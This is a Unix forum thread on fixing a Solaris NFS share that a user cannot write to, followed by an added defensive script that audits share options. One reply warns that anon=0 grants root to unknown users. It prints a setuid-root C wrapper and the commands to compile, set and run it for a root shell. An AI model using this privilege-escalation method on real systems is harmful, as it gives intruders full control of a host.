Unable to write to a mounted NFS share


 
# 1  
Old 09-12-2014

Hi All,

I created an NFS share on the server (Solaris 10) with the following command and also updated the dfstab file:

share -F nfs -o rw=server_name2,anon=0 /to_share

And then on the client (Solaris 10) added the following command to mount the share:

mount -F nfs server_name1:/to_share /shared_by


On the client, I changed the owner of the mount directory and all the files in it to another user (oracle).
But it doesn't allow oracle to modify the file or create a new file in the dir.

Please let me know if I need to change any option.

Thanks
# 2  
Old 09-13-2014
What you've done seems to me like it should work. Nothing jumps out at me as being incorrect. It could be a permissions issue; perhaps not.

What I would do is to get it working first by opening up security if it's not too big a risk for the site, and then close things down step by step checking it still works.

Here's what I would do in your position...........

1. Are you sure that the shared directory on the server allows writing permission to that client? To be sure set the actual shared directory rights to 777. Does it work now?

2. When the server receives an in-bound connection request it only has the client's IP address. Can the server resolve that to the client name that you have given in your share command? Ensure that the client (and its IP address) appears in /etc/hosts or can be resolved through DNS. If not, the server doesn't know who's who.

(On the server, if you

Code:
# ping <client name>

Do you get the correct response? Is the client name resolved to the correct ip address?)

Does it work now?

3. Try changing your share command to:

Code:
share -F nfs -o rw,root=server_name2 /to_share

to give the in-bound connection root permissions on the server. (You can also omit the anon=0, it's a "catch all" for unidentified users.)

Does it work now?

Remember that you may need to re-issue the server share, and re-issue the client NFS mount to test it.

Hope that helps.

Do please post back your progress. There are other things to try. There's loads of expertise on this forum to help you, be assured of that.

If you can take the security risk, get it working first at any cost and then tighten up afterwards. If you can't take that risk, let us know.

Last edited by hicksd8; 09-15-2014 at 04:37 PM..
# 3  
Old 09-15-2014
Hi,

Thank you for your most detailed answer; it solved my problem when I used root=server_name2.
But somehow I had to use anon=0 too, without which it didn't allow the user to create any file in the dir.

Thanks again.
# 4  
Old 09-15-2014
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
# 5  
Old 09-15-2014
Having to use
Code:
anon=0

is telling you that
Code:
rw,root=<client name>

is not sufficient to identify the client. See note 2 in my post#2.

Did you put (previously created) files in the share directory on the server? If so, what security mask is on them? You may have set the parent share directory to 777, but what about the files below?

Yes, as I recommended you got it working "at any cost" but you now need to consider the security level you are going to run with.

As already pointed out by Achenle, using anon=0 gives root access to all unidentified users. It all depends whether you can risk that.
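
Added example, not written by any poster in this thread: a small audit of dfstab-style share lines for the options discussed above, run over the two share commands quoted in the thread plus a constructed tightened variant. The finding names, the function names and the third sample line are assumptions of this example; `nosuid` is the share_nfs option that makes the server ignore attempts to set setuid/setgid bits.

```shell
#!/bin/sh
# Added example (not from the thread): flag risky options in Solaris
# dfstab-style "share" lines read from stdin.
# Finding codes are this example's own names:
#   ANON_ROOT    anon=0: unidentified users are mapped to root
#   RW_ANY_HOST  bare rw: read-write for every client, no access list
#   SUID_ALLOWED no nosuid: clients may set setuid/setgid bits on files

audit_share_line() {
    line=$1 opts= prev= nosuid=0
    set -f                              # no globbing while word-splitting
    for w in $line; do
        if [ "$prev" = "-o" ]; then opts=$w; fi
        prev=$w
    done
    dir=$prev                           # the shared pathname is the last field
    old_ifs=$IFS; IFS=,
    for o in $opts; do
        case $o in
            anon=0) echo "ANON_ROOT $dir ($opts)" ;;
            rw)     echo "RW_ANY_HOST $dir ($opts)" ;;
            nosuid) nosuid=1 ;;
        esac
    done
    IFS=$old_ifs
    set +f
    if [ "$nosuid" -eq 0 ]; then echo "SUID_ALLOWED $dir ($opts)"; fi
}

audit_dfstab() {
    while IFS= read -r l; do
        case $l in
            share*) audit_share_line "$l" ;;   # comments and blanks are skipped
        esac
    done
}

# Constructed sample: lines 1-2 are the share commands quoted in the thread,
# line 3 is a hypothetical tightened variant.
sample_dfstab() {
    cat <<'EOF'
# /etc/dfs/dfstab (constructed sample)
share -F nfs -o rw=server_name2,anon=0 /to_share
share -F nfs -o rw,root=server_name2 /to_share
share -F nfs -o rw=server_name2,root=server_name2,nosuid /to_share
EOF
}

sample_dfstab | audit_dfstab
```

On a real server the same function can be fed the live file with `audit_dfstab < /etc/dfs/dfstab`.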
 
